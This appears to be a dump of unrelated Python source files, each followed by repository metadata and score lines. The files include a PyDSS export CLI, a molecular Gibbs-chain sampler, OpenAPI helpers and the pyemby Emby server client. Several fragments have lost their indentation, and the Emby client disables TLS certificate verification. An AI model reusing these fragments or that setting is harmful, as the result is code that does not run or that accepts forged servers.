print(f"Reporting {state}")
try:
res = session.post(args.url, json={"state": state, "attributes": {}}, timeout=10)
if not res.ok:
raise IOError(f"Response is not ok! Code: {res.status_code} Content: {res.content.decode('utf-8')}")
print(f"Report ok :) Response: {res.content.decode('utf-8')}")
last_report = time()
except Exception as e:
print(f"Can't connect: {e}")
sleep(5)
# If not this, the script will use 100% cpu xD
sleep(0.1)
| 3.0625 | 3 |
src/rest/endpoint.py | leolani/cltl-demo-component | 0 | 12760268 | <reponame>leolani/cltl-demo-component<filename>src/rest/endpoint.py
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from apispec.yaml_utils import load_yaml_from_docstring
from marshmallow_dataclass import class_schema
from cltl.demo.api import ExampleOutput, ExampleInput
from cltl.demo.implementation import DummyExampleComponent
class OpenAPISpec:
    """Thin wrapper around :class:`apispec.APISpec` adding a decorator API.

    NOTE: ``to_yaml``, ``to_dict`` and ``components`` are *properties* --
    access them without parentheses (e.g. ``api.to_yaml``); they already
    invoke the underlying APISpec call.
    """
    def __init__(self, *args, **kwargs):
        # All arguments are forwarded verbatim to apispec.APISpec.
        self.spec = APISpec(*args, **kwargs)
    @property
    def to_yaml(self):
        # The serialized OpenAPI document as a YAML string.
        return self.spec.to_yaml()
    @property
    def to_dict(self):
        # The serialized OpenAPI document as a plain dict.
        return self.spec.to_dict()
    @property
    def components(self):
        # The underlying APISpec components registry (schemas, etc.).
        return self.spec.components
    def path(self, path):
        """Decorator registering *func* as the handler for *path*.

        The summary is taken from the first line of the function's
        docstring; the operations are parsed from the YAML embedded in the
        rest of the docstring.
        """
        def wrapped(func):
            self.spec.path(path,
                           description=func.__doc__.partition('\n')[0],
                           operations=load_yaml_from_docstring(func.__doc__))
            return func
        return wrapped
api = OpenAPISpec(title="Template",
version="0.0.1",
openapi_version="3.0.2",
info=dict(description="Leolani component template"),
plugins=[MarshmallowPlugin()], )
api.components.schema("ExampleInput", schema=class_schema(ExampleInput))
api.components.schema("ExampleOutput", schema=class_schema(ExampleOutput))
@api.path("/template/api/foo/bar")
def foo_bar(input):
"""Short Description included in OpenAPI spec
A longer description can go here.
The yaml snippet below is included in the OpenAPI spec for the endpoint:
---
get:
operationId: rest.endpoint.foo_bar
responses:
'200':
content:
application/json:
schema:
$ref: '#/components/schemas/ExampleOutput'
description: Get foo bars
parameters:
- in: query
name: times
schema:
$ref: '#/components/schemas/ExampleInput'
"""
return DummyExampleComponent().foo_bar(input)
if __name__ == '__main__':
    # Dump the OpenAPI document to disk.  ``to_yaml`` is a *property* on
    # OpenAPISpec (it already invokes APISpec.to_yaml() and returns a str),
    # so it must not be called: ``api.to_yaml()`` raised
    # ``TypeError: 'str' object is not callable``.
    with open("template_spec.yaml", "w") as f:
        f.write(api.to_yaml)
| 2.03125 | 2 |
tests/legacy/test_utils.py | NeoLight1010/strawberry-graphql-django | 18 | 12760269 | from strawberry_django.legacy import utils
def test_basic_filters():
    """Comparison/equality filters split into include and exclude maps."""
    raw = ['id__gt=5', 'name="you"', 'name__contains!="me"']
    # Avoid shadowing the builtin `filter` with the result name.
    include, excluded = utils.process_filters(raw)
    assert include == {'id__gt': 5, 'name': 'you'}
    assert excluded == {'name__contains': 'me'}
def test_is_in_filter():
    """``__in`` filters parse their right-hand side as a list literal."""
    include, excluded = utils.process_filters(
        ['id__in=[1, 2, 3]', 'group__in!=["a", "b", "x y z"]'])
    assert include == {'id__in': [1, 2, 3]}
    assert excluded == {'group__in': ['a', 'b', 'x y z']}
| 2.28125 | 2 |
code/genric/deploy/chain.py | wendazhou/reversible-inductive-construction | 31 | 12760270 | import argparse
import numpy as np
import time
from datetime import datetime
import os
from copy import deepcopy
import functools
import typing
import pickle
from .. import Chem
from .. import chemutils
import rdkit
from rdkit.Chem import Draw
import rdkit.RDLogger
import torch
from ..chemutils import get_mol, get_smiles, get_smiles_2D
from .. import vocabulary
from .. import data_utils
from .. import action, molecule_representation as mr, model as mo
from .. import molecule_edit as me
from ..molecule_models import joint_network
from ..molecule_models import action_representation as ar
from ..molecule_models._train_utils import replace_sparse_tensor, load_cuda_async, cast_numpy_to_torch
from ._data import SampleResult
SIZE_CAP = 25
class GibbsSampler:
    """Runs a Gibbs chain that alternates between a provided corruption distribution and reconstruction model.
    """
    def __init__(self, model, expected_corruption_steps=5, action_encoder=None, device=None):
        """
        Parameters
        ----------
        model: a Pytorch network that takes as input a molecular graph (x_tilde) and returns logits
            over all possible actions.
        expected_corruption_steps: the expected length of the corruption sequence,
            used to determine the geometric distribution parameter.
        action_encoder: used to specify the vocab size and possible actions
            (of default type action_representation.VocabInsertEncoder)
        device: torch device to run the model on (None = default device).
        """
        self.model = model
        self.expected_corruption_steps = expected_corruption_steps
        self.vocab = vocabulary.Vocabulary()
        if action_encoder is None:
            action_encoder = ar.VocabInsertEncoder(canonical=True)
        self.action_encoder = action_encoder
        self.device = device
    def corrupter(self, mol, rng=np.random, return_seq=False):
        """Corrupts the input (of type rdkit Mol) via the default random insert & delete operations in molecule_edit.py.

        The number of corruption steps is geometric with mean
        ``expected_corruption_steps``.  If the corrupted molecule exceeds the
        size cap or gets fragmented, the whole corruption is retried from the
        original molecule.
        """
        seq = [mol]
        acts = []
        ori_mol = deepcopy(mol)
        # Geometric draw minus one so zero corruption steps are possible.
        number_of_steps = rng.geometric(1 / (1 + self.expected_corruption_steps)) - 1
        for _ in range(number_of_steps):
            # Coin flip between deletion and insertion; deletion needs at
            # least two leaves to remain a valid molecule.
            if rng.uniform() < 0.5 and len(me.get_leaves(mol)) >= 2:
                mol, this_act = me.delete_random_leaf(mol, rng=rng, return_action=True)
            else:
                mol, this_act = me.insert_random_node(mol, self.vocab, rng=rng, return_action=True)
            seq.append(mol)
            acts.append(this_act)
        # Size cap
        if mol.GetNumAtoms() > SIZE_CAP:
            return self.corrupter(ori_mol, rng=rng, return_seq=return_seq)
        # Avoid splits (rare)
        if '.' in get_smiles_2D(mol):
            return self.corrupter(ori_mol, rng=rng, return_seq=return_seq)
        if not return_seq:
            return mol
        else:
            return mol, seq
    def _reconstruct_single_step(self, x_tilde):
        """ Runs a single step of the reconstruction process.
        Parameters
        ----------
        x_tilde: the input molecule to the reconstructor
        Returns
        -------
        A tuple of two elements.
        mol: Either the one-step action applied to the denoiser, if it was valid,
            or None if the sampled actions were invalid.
        act: The action that was sampled for the molecule.
        """
        # Featurize the molecule into the graph representation the model expects.
        x_tilde_graph = mr.combine_mol_graph(
            [mr.mol2graph_single(x_tilde, include_leaves=True, include_rings=True, normalization='sqrt')],
            return_namedtuple=True,
            cast_tensor=cast_numpy_to_torch)
        x_tilde_graph = load_cuda_async(x_tilde_graph, device=self.device)
        x_tilde_graph = mr.GraphInfo.from_sequence(x_tilde_graph)
        x_tilde_graph = replace_sparse_tensor(x_tilde_graph)
        logits_and_scopes = self.model(x_tilde_graph)
        # Sample 5 candidate action indices from the model's distribution.
        predictions, cand_act_idxs = mo.classification.multi_classification_prediction(
            logits_and_scopes, predict=True, num_samples=5)
        for i, act_idx in enumerate(cand_act_idxs.cpu()[0]):
            act_idx = act_idx.item()
            # Get corresponding action object and try executing it
            lengths = ar.compute_action_lengths(x_tilde, self.action_encoder)
            act = ar.integer_to_action(act_idx, lengths, self.action_encoder)
            try:
                result = me.compute_action(x_tilde, act, vocab=self.vocab)
                break
            except ValueError:
                # Invalid action for this molecule; try the next candidate.
                pass
        else:
            # No valid action sampled.
            result = None
        return result, act
    def reconstruct(self, actual_x_tilde, return_seq=False):
        """ Runs the reconstructor on the given molecule.
        Parameters
        ----------
        actual_x_tilde: the corrupted molecule
        return_seq: if True, returns the denoising sequence, otherwise,
            only return the last denoised value.

        Returns
        -------
        ``(x, num_steps_taken, is_revisit)`` (plus the sequence when
        ``return_seq``); ``x`` is None when no valid terminal state was
        reached.
        """
        # Reconstruct
        x = None
        if return_seq:
            seq = [actual_x_tilde]
        x_tilde = deepcopy(actual_x_tilde)
        num_steps_taken = 0
        # Track visited SMILES so cycles in the denoising walk terminate it.
        visited_smiles = {get_smiles_2D(actual_x_tilde): 0}
        is_revisit = False
        while True:
            x_tilde, act = self._reconstruct_single_step(x_tilde)
            if x_tilde is None:
                print('Did not sample valid action. Returning to previous mol.')
                break
            num_steps_taken += 1
            this_smiles = get_smiles_2D(x_tilde)
            is_revisit = False
            if this_smiles in visited_smiles:
                # print('Revisited on step %i' % visited_smiles[this_smiles])
                is_revisit = True
            else:
                visited_smiles[this_smiles] = num_steps_taken
            # Terminate on an explicit Stop action or on revisiting a state.
            if is_revisit or isinstance(act, action.Stop):
                if x_tilde.GetNumAtoms() > SIZE_CAP:
                    # print('Mol too large. Returning to previous mol.')
                    pass
                elif '.' in get_smiles_2D(x_tilde):
                    # Avoid splits (rare). Leaving this as return to previous
                    # print('Broke mol. Returning to previous mol.')
                    pass
                else:
                    x = x_tilde
                break
        if not return_seq:
            return x, num_steps_taken, is_revisit
        else:
            return x, seq, num_steps_taken, is_revisit
    def _apply_corrupter(self, x, rng, check_substructure):
        # Draw corruptions until one succeeds and keeps the (optional)
        # marked substructure intact; returns the corrupted molecule and the
        # length of the corruption sequence.
        while True:
            try:
                actual_x_tilde, seq = self.corrupter(x, rng=rng, return_seq=True)
                if check_substructure(actual_x_tilde):
                    break
            except ValueError:
                print('Corruption failed. Retrying corruption.')
                pass
        return actual_x_tilde, len(seq)
    def run_chain(self, init_smiles=None, num_transitions=1000, sample_freq=1, seed=None, substructure=None):
        """
        Parameters
        ----------
        init_smiles: the SMILES string with which to initialize the chain.
            If not provided, a random string from the ZINC validation set will be used.
        num_transitions: total number of chain transitions to run.
        sample_freq: frequency to print chain's state.
        seed: seed for numpy.random.
        substructure: optional SMILES; when given, the chain starts from it
            and every sample must preserve its (atom-mapped) atoms.
        """
        if not seed:
            seed = np.random.randint(2**31 - 1)
        # Seed numpy and torch for a reproducible chain.
        rng = np.random.RandomState(seed)
        torch.manual_seed(seed)
        torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False
        torch.autograd.set_grad_enabled(False)
        # Initialize chain
        if substructure is not None:
            init_smiles = substructure
        elif not init_smiles:
            path = '../data/zinc/train.txt'
            with open(path, 'r') as f:
                data = [line.strip("\r\n ").split()[0] for line in f]
            init_smiles = rng.choice(data)
        init_smiles = get_smiles_2D(get_mol(init_smiles))
        x = get_mol(init_smiles)
        if substructure is not None:
            # Mark every substructure atom with atom-map number 42 so its
            # survival can be checked after each corruption/reconstruction.
            for atom in x.GetAtoms():
                atom.SetAtomMapNum(42)
            num_marked = x.GetNumAtoms()
            def check_sub_intact(mol):
                num_here = len([atom for atom in mol.GetAtoms() if atom.GetAtomMapNum() == 42])
                if num_here == num_marked:
                    return True
                else:
                    return False
        else:
            def check_sub_intact(mol):
                return True
        # Run chain
        collected_x_tilde = []
        collected_x = [init_smiles]
        print('init_x: %s' % init_smiles)
        num_steps_reconstruct_chain = []
        num_steps_corrupt_chain = []
        revisit_chain = []
        transition_attempts_chain = []
        for t in range(num_transitions):
            transition_attempts = 0
            while True:
                actual_x_tilde, num_steps_corrupt = self._apply_corrupter(x, rng, check_sub_intact)
                # Reconstruct
                for _ in range(10):
                    # Attempt 10 possible reconstruction transitions from the given corruption.
                    transition_attempts += 1
                    potential_x, num_steps_reconstruct, revisit = self.reconstruct(actual_x_tilde)
                    if potential_x is not None and check_sub_intact(potential_x):
                        # If the proposed x is valid, record it, and move to next transition.
                        x = potential_x
                        break
                else:
                    # If none of the proposed reconstructions are valid after 10 steps,
                    # we retry the entire transition (including sampling the corruption).
                    continue
                # Break out of the loop to validate a single transition.
                break
            if (t + 1) % sample_freq == 0:
                # Print current state
                collected_x_tilde.append(get_smiles_2D(actual_x_tilde))
                collected_x.append(get_smiles_2D(x))
                num_steps_corrupt_chain.append(num_steps_corrupt)
                num_steps_reconstruct_chain.append(num_steps_reconstruct)
                revisit_chain.append(revisit)
                transition_attempts_chain.append(transition_attempts)
                print('Iteration: %i' % (t + 1))
                print('x_tilde: %s, x: %s' % (get_smiles_2D(actual_x_tilde), get_smiles_2D(x)))
        return SampleResult(
            seed, self.expected_corruption_steps, collected_x, collected_x_tilde,
            num_steps_corrupt_chain, num_steps_reconstruct_chain, transition_attempts_chain,
            revisit_chain, {})
def save_result(result: SampleResult, parameters=None):
    """Pickle a SampleResult to disk.

    Parameters (all optional, read from the `parameters` dict):
        output_path: explicit file to write. If absent, an unused
            result_<i>.pkl name is picked inside the save directory.
        save_dir: directory for auto-named results (default '../output/').
        model_path: recorded into result.meta for provenance.
    """
    if parameters is None:
        parameters = {}
    path = parameters.get('output_path')
    if path is None:
        savedir = parameters.get('save_dir')
    else:
        savedir = os.path.dirname(path)
    if savedir is None:
        savedir = '../output/'
    if path is None:
        # Probe for the first unused auto-numbered filename.
        for i in range(1000):
            path = os.path.join(savedir, 'result_{0}.pkl'.format(i))
            if not os.path.exists(path):
                break
        else:
            raise ValueError("All paths exist.")
    # Bug fix: when output_path is a bare filename, dirname() yields '' and
    # os.makedirs('') raises FileNotFoundError. Only create a directory when
    # there actually is one.
    if savedir:
        os.makedirs(savedir, exist_ok=True)
    # Record which model produced this chain alongside the samples.
    result = result._replace(meta={
        **result.meta,
        'model_path': parameters.get('model_path', "Model path unknown.")
    })
    print('Saving result in path {0}'.format(os.path.abspath(path)))
    with open(path, 'wb') as f:
        pickle.dump(result, f, protocol=pickle.HIGHEST_PROTOCOL)
def main():
    """CLI entry point: load a trained joint model and run the Gibbs chain."""
    # Silence rdkit's very chatty logger before doing any chemistry.
    rdkit_logger = rdkit.RDLogger.logger()
    rdkit_logger.setLevel(rdkit.RDLogger.CRITICAL)

    parser = argparse.ArgumentParser()
    parser.add_argument('--model_path', default=None)
    parser.add_argument('--seed', default=None, type=int)
    parser.add_argument('--expected_corruption_steps', default=5, type=int)
    parser.add_argument('--num_transitions', default=1000, type=int)
    parser.add_argument('--sample_freq', default=1, type=int)
    parser.add_argument('--substructure', default=None)
    parser.add_argument('--device', default='cpu')
    parser.add_argument('--save_dir', default=None)
    args = parser.parse_args()

    if not args.model_path:
        raise ValueError('Please specify a model path.')

    # Build the action encoder and the classification network, then restore
    # the trained weights (always loaded onto CPU first, then moved).
    action_encoder = ar.VocabInsertEncoder(canonical=True)
    network_config = joint_network.JointClassificationNetworkConfiguration(
        action_encoder.get_num_atom_insert_locations(),
        action_encoder.num_insert_bond_locations,
        hidden_size=384)
    model = joint_network.JointClassificationNetwork(1, network_config)
    model.load_state_dict(torch.load(args.model_path, map_location='cpu'))

    target_device = torch.device(args.device)
    model = model.to(device=target_device)
    model.eval()

    # Run the chain and persist the collected samples.
    sampler = GibbsSampler(
        model, args.expected_corruption_steps, action_encoder, target_device)
    result = sampler.run_chain(
        seed=args.seed,
        num_transitions=args.num_transitions,
        sample_freq=args.sample_freq,
        substructure=args.substructure)
    save_result(result, vars(args))
# Script entry point: run the sampling CLI when executed directly.
if __name__ == '__main__':
    main()
| 2.078125 | 2 |
scripts.py | mukherjeeakash/GestureRecognizer | 0 | 12760271 | import numpy as np
import tensorflow as tf
import os
# Container for the serialized TensorFlow (TF1-style) graph definition.
graph_def = tf.GraphDef()
# NOTE(review): labels is pre-seeded with "0", "1", "2" and then extended
# from labels.txt below — if labels.txt also contains these entries they
# will appear twice. Confirm whether the hard-coded seed is intentional.
labels = ["0","1","2"]

# Import the TF graph
with tf.gfile.FastGFile("model.pb", 'rb') as f:
    graph_def.ParseFromString(f.read())
    # name='' keeps the imported node names unprefixed.
    tf.import_graph_def(graph_def, name='')

# Create a list of labels.
with open("labels.txt", 'rt') as lf:
    for l in lf:
        labels.append(l.strip())
build/lib/pyconfluent/__init__.py | newellp2019/pyconfluent | 0 | 12760272 | <filename>build/lib/pyconfluent/__init__.py
from .ksql import KSQL
from .schema_registry import SchemaRegistry | 1.046875 | 1 |
PyDSS/cli/export.py | JMorganUSU/PyDSS | 21 | 12760273 | <filename>PyDSS/cli/export.py
"""
CLI to export data from a PyDSS project
"""
import logging
import os
import sys
import click
from PyDSS.pydss_project import PyDssProject
from PyDSS.pydss_results import PyDssResults
from PyDSS.loggers import setup_logging
from PyDSS.utils.utils import get_cli_string
logger = logging.getLogger(__name__)
# TODO Make command to list scenarios.
@click.argument(
    "project-path",
)
@click.option(
    "-f", "--fmt",
    default="csv",
    help="Output file format (csv or h5)."
)
@click.option(
    "-c", "--compress",
    is_flag=True,
    default=False,
    show_default=True,
    help="Compress output files.",
)
@click.option(
    "-o", "--output-dir",
    help="Output directory. Default is project exports directory.",
)
@click.option(
    "--verbose",
    is_flag=True,
    default=False,
    show_default=True,
    help="Enable verbose log output."
)
@click.command()
def export(project_path, fmt="csv", compress=False, output_dir=None, verbose=False):
    """Export data from a PyDSS project.

    Loads every scenario in the project's results and writes each one to
    the chosen format, optionally compressed.
    """
    if not os.path.exists(project_path):
        # Bug fix: previously exited with status 1 but printed nothing,
        # leaving the user with no clue why the command failed.
        print(f"Error: project path '{project_path}' does not exist.",
              file=sys.stderr)
        sys.exit(1)

    filename = "pydss_export.log"
    console_level = logging.INFO
    file_level = logging.INFO
    if verbose:
        console_level = logging.DEBUG
        file_level = logging.DEBUG
    setup_logging(
        "PyDSS",
        filename=filename,
        console_level=console_level,
        file_level=file_level,
    )
    logger.info("CLI: [%s]", get_cli_string())

    results = PyDssResults(project_path)
    # Export every scenario recorded in the project's results.
    for scenario in results.scenarios:
        scenario.export_data(output_dir, fmt=fmt, compress=compress)
pyemby/server.py | mezz64/pyEmby | 14 | 12760274 | <gh_stars>10-100
"""
pyemby.server
~~~~~~~~~~~~~~~~~~~~
Provides api for Emby server
Copyright (c) 2017-2021 <NAME> <https://github.com/mezz64>
Licensed under the MIT license.
"""
import logging
import json
import uuid
import asyncio
import aiohttp
import async_timeout
from pyemby.device import EmbyDevice
from pyemby.constants import (
__version__, DEFAULT_TIMEOUT, DEFAULT_HEADERS, API_URL, SOCKET_URL,
STATE_PAUSED, STATE_PLAYING, STATE_IDLE)
from pyemby.helpers import deprecated_name, clean_none_dict_values
_LOGGER = logging.getLogger(__name__)
"""
Some general project notes that don't fit anywhere else:
Emby api workflow:
Any command-style actions are completed through the http api, not websockets.
Websocket provides play start and play stop notifications by default.
Can request session updates via:
{"MessageType":"SessionsStart", "Data": "0,1500"}
{"MessageType":"SessionsStop", "Data": ""}
Http api and websocket connection are handled async,
everything else can be done with normal methods
"""
class EmbyServer(object):
    """Asyncio client for an Emby media server.

    Registers over the HTTP API, then listens on the server websocket for
    session updates, maintaining a dictionary of EmbyDevice objects and
    firing registered callbacks on new / stale / updated devices.
    """

    def __init__(self, host, api_key, port=8096, ssl=False, loop=None):
        """Initialize base class."""
        self._host = host
        self._api_key = api_key
        self._port = port
        self._ssl = ssl
        self._sessions = None
        # Known devices, keyed by "<DeviceId>.<Client>".
        self._devices = {}

        _LOGGER.debug("pyEmby %s initializing new server at: %s",
                      __version__, host)

        # Run on a caller-supplied loop if given, otherwise own one.
        if loop is None:
            _LOGGER.info("Creating our own event loop.")
            self._event_loop = asyncio.new_event_loop()
            self._own_loop = True
        else:
            _LOGGER.info("Latching onto an existing event loop.")
            self._event_loop = loop
            self._own_loop = False

        asyncio.set_event_loop(self._event_loop)

        # Enable for asyncio debug logging
        # self._event_loop.set_debug(True)

        # MAC-derived node id doubles as the Emby DeviceId for this client.
        self._api_id = uuid.getnode()
        headers = DEFAULT_HEADERS.copy()
        headers.update({'x-emby-authorization':
                        'MediaBrowser Client="pyEmby",'
                        'Device="HomeAssistant",'
                        'DeviceId="{}",'
                        'Version="{}"'.format(
                            self._api_id, __version__)})

        conn = aiohttp.TCPConnector(verify_ssl=False)
        self._api_session = aiohttp.ClientSession(
            connector=conn, headers=headers, loop=self._event_loop)
        self.wsck = None

        # Callbacks
        self._new_devices_callbacks = []
        self._stale_devices_callbacks = []
        self._update_callbacks = []

        self._shutdown = False
        self._registered = False

    @property
    def unique_id(self):
        """Return unique ID for connection to Emby."""
        return self._api_id

    @property
    def api_key(self):
        """ Return api key. """
        return self._api_key

    @property
    @deprecated_name('get_sessions')
    def sessions(self):
        """ Return sessions json. """
        return self._sessions

    @property
    def devices(self):
        """ Return devices dictionary. """
        return self._devices

    def add_new_devices_callback(self, callback):
        """Register as callback for when new devices are added. """
        self._new_devices_callbacks.append(callback)
        _LOGGER.debug('Added new devices callback to %s', callback)

    def _do_new_devices_callback(self, msg):
        """Call registered callback functions."""
        for callback in self._new_devices_callbacks:
            _LOGGER.debug('Devices callback %s', callback)
            self._event_loop.call_soon(callback, msg)

    def add_stale_devices_callback(self, callback):
        """Register as callback for when stale devices exist. """
        self._stale_devices_callbacks.append(callback)
        _LOGGER.debug('Added stale devices callback to %s', callback)

    def _do_stale_devices_callback(self, msg):
        """Call registered callback functions."""
        for callback in self._stale_devices_callbacks:
            _LOGGER.debug('Stale Devices callback %s', callback)
            self._event_loop.call_soon(callback, msg)

    def add_update_callback(self, callback, device):
        """Register as callback for when a matching device changes."""
        self._update_callbacks.append([callback, device])
        _LOGGER.debug('Added update callback to %s on %s', callback, device)

    def remove_update_callback(self, callback, device):
        """ Remove a registered update callback. """
        if [callback, device] in self._update_callbacks:
            self._update_callbacks.remove([callback, device])
            _LOGGER.debug('Removed update callback %s for %s',
                          callback, device)

    def _do_update_callback(self, msg):
        """Call registered callback functions."""
        # Only fire callbacks registered for the device named in msg.
        for callback, device in self._update_callbacks:
            if device == msg:
                _LOGGER.debug('Update callback %s for device %s by %s',
                              callback, device, msg)
                self._event_loop.call_soon(callback, msg)

    def start(self):
        """Public method for initiating connectivity with the emby server."""
        asyncio.ensure_future(self.register(), loop=self._event_loop)

        if self._own_loop:
            # We created the loop, so we also drive it (blocking call).
            _LOGGER.info("Starting up our own event loop.")
            self._event_loop.run_forever()
            self._event_loop.close()
            _LOGGER.info("Connection shut down.")

    async def stop(self):
        """Async method for stopping connectivity with the emby server."""
        # Flag checked by socket_connection() so the reconnect loop exits.
        self._shutdown = True

        if self.wsck:
            _LOGGER.info('Closing Emby server websocket.')
            await self.wsck.close()
            self.wsck = None

        if self._own_loop:
            _LOGGER.info("Shutting down Emby server loop...")
            self._event_loop.call_soon_threadsafe(self._event_loop.stop)

    def construct_url(self, style):
        """ Return http/https or ws/wss url. """
        if style is API_URL:
            if self._ssl:
                return 'https://{}:{}'.format(self._host, self._port)
            else:
                return 'http://{}:{}'.format(self._host, self._port)
        elif style is SOCKET_URL:
            if self._ssl:
                return 'wss://{}:{}'.format(self._host, self._port)
            else:
                return 'ws://{}:{}'.format(self._host, self._port)
        else:
            return None

    async def register(self):
        """Register library device id and get initial device list. """
        url = '{}/Sessions'.format(self.construct_url(API_URL))
        params = {'api_key': self._api_key}

        reg = await self.api_request(url, params)
        if reg is None:
            self._registered = False
            _LOGGER.error('Unable to register emby client.')
        else:
            self._registered = True
            _LOGGER.info('Emby client registered!, Id: %s', self.unique_id)
            self._sessions = clean_none_dict_values(reg)

        # Build initial device list.
        self.update_device_list(self._sessions)

        # socket_connection() bails out itself when registration failed.
        asyncio.ensure_future(self.socket_connection(), loop=self._event_loop)

    async def api_post(self, url, params):
        """Make api post request."""
        post = None
        try:
            with async_timeout.timeout(DEFAULT_TIMEOUT):
                post = await self._api_session.post(
                    url, params=params)

            if post.status != 204:
                # Emby replies 204 No Content on a successful command post.
                _LOGGER.error('Error posting Emby data: %s', post.status)
                return None

            post_result = await post.text()
            return post_result

        except (aiohttp.ClientError, asyncio.TimeoutError,
                ConnectionRefusedError) as err:
            _LOGGER.error('Error posting Emby data: %s', err)
            return None

    async def api_request(self, url, params):
        """Make api fetch request."""
        request = None
        try:
            with async_timeout.timeout(DEFAULT_TIMEOUT):
                request = await self._api_session.get(
                    url, params=params)

            if request.status != 200:
                _LOGGER.error('Error fetching Emby data: %s', request.status)
                return None

            request_json = await request.json()
            if 'error' in request_json:
                _LOGGER.error('Error converting Emby data to json: %s: %s',
                              request_json['error']['code'],
                              request_json['error']['message'])
                return None

            return request_json

        except (aiohttp.ClientError, asyncio.TimeoutError,
                ConnectionRefusedError) as err:
            _LOGGER.error('Error fetching Emby data: %s', err)
            return None

    async def socket_connection(self):
        """ Open websocket connection.

        Runs a reconnect loop with linearly increasing logged back-off until
        stop() sets the shutdown flag.
        """
        if not self._registered:
            _LOGGER.error('Client not registered, cannot start socket.')
            return

        url = '{}?DeviceID={}&api_key={}'.format(
            self.construct_url(SOCKET_URL), self._api_id, self._api_key)

        fail_count = 0
        while True:
            _LOGGER.debug('Attempting Socket Connection.')
            try:
                with async_timeout.timeout(DEFAULT_TIMEOUT):
                    self.wsck = await self._api_session.ws_connect(url)

                # Enable sever session updates:
                try:
                    msg = await self.wsck.send_str(
                        '{"MessageType":"SessionsStart", "Data": "0,1500"}')
                except Exception as err:
                    # Catch all for now
                    _LOGGER.error('Failure setting session updates: %s', err)
                    raise ValueError('Session updates error.')

                _LOGGER.debug('Socket Connected!')
                fail_count = 0
                while True:
                    msg = await self.wsck.receive()
                    if msg.type == aiohttp.WSMsgType.text:
                        # Process data
                        self.process_msg(msg.data)

                    elif msg.type == aiohttp.WSMsgType.closed:
                        raise ValueError('Websocket was closed.')

                    elif msg.type == aiohttp.WSMsgType.error:
                        _LOGGER.debug(
                            'Websocket encountered an error: %s', msg)
                        raise ValueError('Websocket error.')

            except (aiohttp.ClientError, asyncio.TimeoutError,
                    aiohttp.WSServerHandshakeError,
                    ConnectionRefusedError, OSError, ValueError) as err:
                if not self._shutdown:
                    fail_count += 1
                    _LOGGER.debug('Websocket unintentionally closed.'
                                  ' Trying reconnect in %ss. Error: %s',
                                  (fail_count * 5) + 5, err)
                    # NOTE(review): the log message advertises a growing
                    # delay, but the actual sleep is a fixed 15s — confirm
                    # which is intended.
                    await asyncio.sleep(15, self._event_loop)
                    continue
                else:
                    break

    def process_msg(self, msg):
        """Process messages from the event stream."""
        jmsg = json.loads(msg)
        msgtype = jmsg['MessageType']
        msgdata = jmsg['Data']

        _LOGGER.debug('New websocket message recieved of type: %s', msgtype)

        if msgtype == 'Sessions':
            self._sessions = clean_none_dict_values(msgdata)
            # Check for new devices and update as needed.
            self.update_device_list(self._sessions)
        """
        May process other message types in the future.
        Other known types are:
        - PlaybackStarted
        - PlaybackStopped
        - SessionEnded
        """

    def update_device_list(self, sessions):
        """ Update device list.

        Adds EmbyDevice wrappers for unseen sessions, refreshes known ones,
        flags vanished ones inactive, and fires the matching callbacks.
        """
        if sessions is None:
            _LOGGER.error('Error updating Emby devices.')
            return

        new_devices = []
        active_devices = []
        dev_update = False
        for device in sessions:
            dev_name = '{}.{}'.format(device['DeviceId'], device['Client'])

            try:
                _LOGGER.debug('Session msg on %s of type: %s, themeflag: %s',
                              dev_name, device['NowPlayingItem']['Type'],
                              device['NowPlayingItem']['IsThemeMedia'])
            except KeyError:
                pass

            active_devices.append(dev_name)
            if dev_name not in self._devices and \
                    device['DeviceId'] != str(self._api_id):
                # Never track our own client session, only remote devices.
                _LOGGER.debug('New Emby DeviceID: %s. Adding to device list.',
                              dev_name)
                new = EmbyDevice(device, self)
                self._devices[dev_name] = new
                new_devices.append(new)
            elif device['DeviceId'] != str(self._api_id):
                # Before we send in new data check for changes to state
                # to decide if we need to fire the update callback
                if not self._devices[dev_name].is_active:
                    # Device wasn't active on the last update
                    # We need to fire a device callback to let subs now
                    dev_update = True

                do_update = self.update_check(
                    self._devices[dev_name], device)
                self._devices[dev_name].update_data(device)
                self._devices[dev_name].set_active(True)
                if dev_update:
                    self._do_new_devices_callback(0)
                    dev_update = False
                if do_update:
                    self._do_update_callback(dev_name)

        # Need to check for new inactive devices and flag
        for dev_id in self._devices:
            if dev_id not in active_devices:
                # Device no longer active
                if self._devices[dev_id].is_active:
                    self._devices[dev_id].set_active(False)
                    self._do_update_callback(dev_id)
                    self._do_stale_devices_callback(dev_id)

        # Call device callback if new devices were found.
        if new_devices:
            self._do_new_devices_callback(0)

    def update_check(self, existing, new):
        """ Check device state to see if we need to fire the callback.

        True if either state is 'Playing'
        False if both states are: 'Paused', 'Idle', or 'Off'
        True on any state transition.
        Theme media (intro music etc.) never triggers an update.
        """
        old_state = existing.state

        if 'NowPlayingItem' in existing.session_raw:
            try:
                old_theme = existing.session_raw['NowPlayingItem']['IsThemeMedia']
            except KeyError:
                old_theme = False
        else:
            old_theme = False

        if 'NowPlayingItem' in new:
            if new['PlayState']['IsPaused']:
                new_state = STATE_PAUSED
            else:
                new_state = STATE_PLAYING

            try:
                new_theme = new['NowPlayingItem']['IsThemeMedia']
            except KeyError:
                new_theme = False
        else:
            new_state = STATE_IDLE
            new_theme = False

        if old_theme or new_theme:
            return False
        elif old_state == STATE_PLAYING or new_state == STATE_PLAYING:
            return True
        elif old_state != new_state:
            return True
        else:
            return False

    def get_latest_items(self, user_id, limit=3, is_played='false',
                         include_item_types='episode'):
        """ Get latest items by scheduling the worker method. """
        if not self._registered:
            _LOGGER.debug('Client not registered, cannot get items.')
            return

        def return_result(future):
            """ Return result. """
            return future.result()

        run_coro = asyncio.ensure_future(self.async_get_latest_items(
            user_id, limit, is_played, include_item_types),
            loop=self._event_loop)
        run_coro.add_done_callback(return_result)

    async def async_get_latest_items(self, user_id, limit=3, is_played='false',
                                     include_item_types='episode'):
        """ Return XX most recent movie or episode additions to library"""
        if not self._registered:
            _LOGGER.debug('Client not registered, cannot get items.')
            return

        url = '{0}/Users/{1}/Items/Latest'.format(
            self.construct_url(API_URL), user_id)
        params = {'api_key': self._api_key,
                  'IncludeItemTypes': include_item_types,
                  'Limit': limit,
                  'IsPlayed': is_played}

        items = await self.api_request(url, params)
        if items is None:
            _LOGGER.debug('Unable to fetch items.')
        else:
            return items
| 2.25 | 2 |
